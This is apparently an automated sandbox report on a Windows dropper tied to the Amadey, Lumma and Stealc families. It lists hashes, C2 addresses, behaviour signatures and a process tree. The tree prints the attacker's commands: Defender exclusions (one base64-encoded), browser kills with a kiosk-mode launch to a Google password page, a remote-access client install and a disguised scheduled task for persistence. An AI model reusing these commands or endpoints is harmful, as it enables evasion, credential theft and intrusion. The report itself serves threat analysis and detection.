Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    20-12-2024 04:11

General

  • Target

    45400639f60d98c903e3942bea79413d9779bb1a62d96ffe1ac621de8dbd3800.exe

  • Size

    2.9MB

  • MD5

    a916c16724e4aa3eef3839f1647f2b0f

  • SHA1

    981069c2d4254ca1b9cf41bc5dab8db5bfda1558

  • SHA256

    45400639f60d98c903e3942bea79413d9779bb1a62d96ffe1ac621de8dbd3800

  • SHA512

    dc4949109a56e0b177a266e3b30d7675a6af578af31e103dc5ca9a3e26da42c01b472b64cbe0b17c4c64890f477bfffc1a95bc256159ce7e112da20971448980

  • SSDEEP

    49152:XYcTFPtXwQoLZUBwsfBvrDtWM2ztzbHm2HCoQVQBhm9vOVTU:vho9UBwsfBTDtW1ztHHmToQycvOVT

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 44 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 38 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1208
      • C:\Users\Admin\AppData\Local\Temp\45400639f60d98c903e3942bea79413d9779bb1a62d96ffe1ac621de8dbd3800.exe
        "C:\Users\Admin\AppData\Local\Temp\45400639f60d98c903e3942bea79413d9779bb1a62d96ffe1ac621de8dbd3800.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1832
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2976
          • C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe
            "C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1496
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\uylry"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2036
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:320
          • C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe
            "C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2056
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"
              5⤵
              • Enumerates connected drives
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:768
          • C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe
            "C:\Users\Admin\AppData\Local\Temp\1017763001\INOKWGC.exe"
            4⤵
            • Executes dropped EXE
            PID:1616
          • C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe
            "C:\Users\Admin\AppData\Local\Temp\1017855001\8ZVMneG.exe"
            4⤵
            • Executes dropped EXE
            PID:1704
          • C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe
            "C:\Users\Admin\AppData\Local\Temp\1017916001\UZAj8wc.exe"
            4⤵
            • Drops startup file
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1952
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANwA5ADEANgAwADAAMQBcAFUAWgBBAGoAOAB3AGMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAHIAbwB4AGkAbQBhAHQAZQBTAGkAegBlAC4AZQB4AGUA
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5408
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 744
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:6056
          • C:\Users\Admin\AppData\Local\Temp\1018024001\6c9463aeea.exe
            "C:\Users\Admin\AppData\Local\Temp\1018024001\6c9463aeea.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3120
          • C:\Users\Admin\AppData\Local\Temp\1018180001\c6be3903da.exe
            "C:\Users\Admin\AppData\Local\Temp\1018180001\c6be3903da.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:4712
            • C:\Users\Admin\AppData\Local\Temp\1018180001\c6be3903da.exe
              "C:\Users\Admin\AppData\Local\Temp\1018180001\c6be3903da.exe"
              5⤵
              • Executes dropped EXE
              PID:4856
            • C:\Users\Admin\AppData\Local\Temp\1018180001\c6be3903da.exe
              "C:\Users\Admin\AppData\Local\Temp\1018180001\c6be3903da.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3036
          • C:\Users\Admin\AppData\Local\Temp\1018181001\8d2e6372d5.exe
            "C:\Users\Admin\AppData\Local\Temp\1018181001\8d2e6372d5.exe"
            4⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:6348
          • C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe
            "C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:784
            • C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe
              "C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe"
              5⤵
              • Executes dropped EXE
              PID:3132
            • C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe
              "C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe"
              5⤵
              • Executes dropped EXE
              PID:3168
            • C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe
              "C:\Users\Admin\AppData\Local\Temp\1018182001\7e169adc32.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3192
          • C:\Users\Admin\AppData\Local\Temp\1018183001\efd2abb107.exe
            "C:\Users\Admin\AppData\Local\Temp\1018183001\efd2abb107.exe"
            4⤵
            • Executes dropped EXE
            PID:4464
          • C:\Users\Admin\AppData\Local\Temp\1018184001\8bd3fe5b3e.exe
            "C:\Users\Admin\AppData\Local\Temp\1018184001\8bd3fe5b3e.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:4976
          • C:\Users\Admin\AppData\Local\Temp\1018185001\6463dd283c.exe
            "C:\Users\Admin\AppData\Local\Temp\1018185001\6463dd283c.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:5824
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ruidpyw"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6072
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6380
          • C:\Users\Admin\AppData\Local\Temp\1018186001\5e0c3f9857.exe
            "C:\Users\Admin\AppData\Local\Temp\1018186001\5e0c3f9857.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • System Location Discovery: System Language Discovery
            PID:1280
          • C:\Users\Admin\AppData\Local\Temp\1018187001\1a05bc3b89.exe
            "C:\Users\Admin\AppData\Local\Temp\1018187001\1a05bc3b89.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3180
          • C:\Users\Admin\AppData\Local\Temp\1018188001\2cee100dc6.exe
            "C:\Users\Admin\AppData\Local\Temp\1018188001\2cee100dc6.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:3720
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3764
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3972
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:4060
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:4100
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
                PID:4168
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  6⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:4184
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.0.738508803\570659207" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3f29cde-a349-48d0-a5b0-cb3babfd4679} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 1336 45f6158 gpu
                    7⤵
                      PID:4504
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.1.934671397\442527941" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04c18c4d-9979-44fd-85a2-07aea43dad6e} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 1520 44fb358 socket
                      7⤵
                        PID:4624
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.2.1100334647\1723947521" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6372fb36-17b3-4c5d-909d-7218acca30da} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 2076 455d558 tab
                        7⤵
                          PID:4956
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.3.88900534\2054719475" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2892 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d926eed3-34cd-450c-af5f-2b19d9abb697} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 2908 e64b58 tab
                          7⤵
                            PID:5452
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.4.1806647272\1461443860" -childID 3 -isForBrowser -prefsHandle 3564 -prefMapHandle 3652 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {739a29ed-37aa-4b0f-b183-df0cce8f3a18} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 3668 1eda1958 tab
                            7⤵
                              PID:6716
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.5.283515430\859737921" -childID 4 -isForBrowser -prefsHandle 3780 -prefMapHandle 3784 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e72df638-f9e0-4e93-a5c8-e11af4043b2d} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 3768 1adf3258 tab
                              7⤵
                                PID:6732
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4184.6.1468704102\918393276" -childID 5 -isForBrowser -prefsHandle 3944 -prefMapHandle 3948 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 808 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {310e6214-9455-4b53-9c79-7dbc8a6d1754} 4184 "\\.\pipe\gecko-crash-server-pipe.4184" 3932 1eda2558 tab
                                7⤵
                                  PID:6772
                          • C:\Users\Admin\AppData\Local\Temp\1018189001\0e9c69b898.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018189001\0e9c69b898.exe"
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6744
                          • C:\Users\Admin\AppData\Local\Temp\1018190001\99f2b4eaea.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018190001\99f2b4eaea.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3976
                          • C:\Users\Admin\AppData\Local\Temp\1018191001\429a7bb242.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018191001\429a7bb242.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:5496
                            • C:\Users\Admin\AppData\Local\Temp\1018191001\429a7bb242.exe
                              "C:\Users\Admin\AppData\Local\Temp\1018191001\429a7bb242.exe"
                              5⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3156
                          • C:\Users\Admin\AppData\Local\Temp\1018192001\7576bc3a77.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018192001\7576bc3a77.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2800
                          • C:\Users\Admin\AppData\Local\Temp\1018193001\a323762f89.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018193001\a323762f89.exe"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4284
                          • C:\Users\Admin\AppData\Local\Temp\1018194001\6ae4237766.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018194001\6ae4237766.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5764
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" Add-MpPreference -ExclusionPath "C:\nixbgze"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6792
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6648
                          • C:\Users\Admin\AppData\Local\Temp\1018195001\4902467e99.exe
                            "C:\Users\Admin\AppData\Local\Temp\1018195001\4902467e99.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3696
                            • C:\Windows\system32\cmd.exe
                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                              5⤵
                                PID:3956
                                • C:\Windows\system32\mode.com
                                  mode 65,10
                                  6⤵
                                    PID:3936
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3924
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_7.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:932
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_6.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:8732
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_5.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4016
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_4.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2384
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_3.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2392
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_2.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4144
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_1.zip -oextracted
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4100
                                  • C:\Windows\system32\attrib.exe
                                    attrib +H "in.exe"
                                    6⤵
                                    • Views/modifies file attributes
                                    PID:4176
                                  • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                    "in.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4536
                                    • C:\Windows\system32\attrib.exe
                                      attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                      7⤵
                                      • Views/modifies file attributes
                                      PID:4584
                                    • C:\Windows\system32\attrib.exe
                                      attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                      7⤵
                                      • Views/modifies file attributes
                                      PID:4660
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                      7⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:5004
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell ping 127.0.0.1; del in.exe
                                      7⤵
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4152
                                      • C:\Windows\system32\PING.EXE
                                        "C:\Windows\system32\PING.EXE" 127.0.0.1
                                        8⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:5820
                              • C:\Users\Admin\AppData\Local\Temp\1018196001\563522f26d.exe
                                "C:\Users\Admin\AppData\Local\Temp\1018196001\563522f26d.exe"
                                4⤵
                                • Enumerates VirtualBox registry keys
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:5676
                              • C:\Users\Admin\AppData\Local\Temp\1018197001\ea0893ced8.exe
                                "C:\Users\Admin\AppData\Local\Temp\1018197001\ea0893ced8.exe"
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:6604
                          • C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe
                            "C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:4912
                        • C:\Windows\system32\msiexec.exe
                          C:\Windows\system32\msiexec.exe /V
                          1⤵
                          • Enumerates connected drives
                          • Boot or Logon Autostart Execution: Authentication Package
                          • Drops file in Program Files directory
                          • Drops file in Windows directory
                          • Modifies data under HKEY_USERS
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
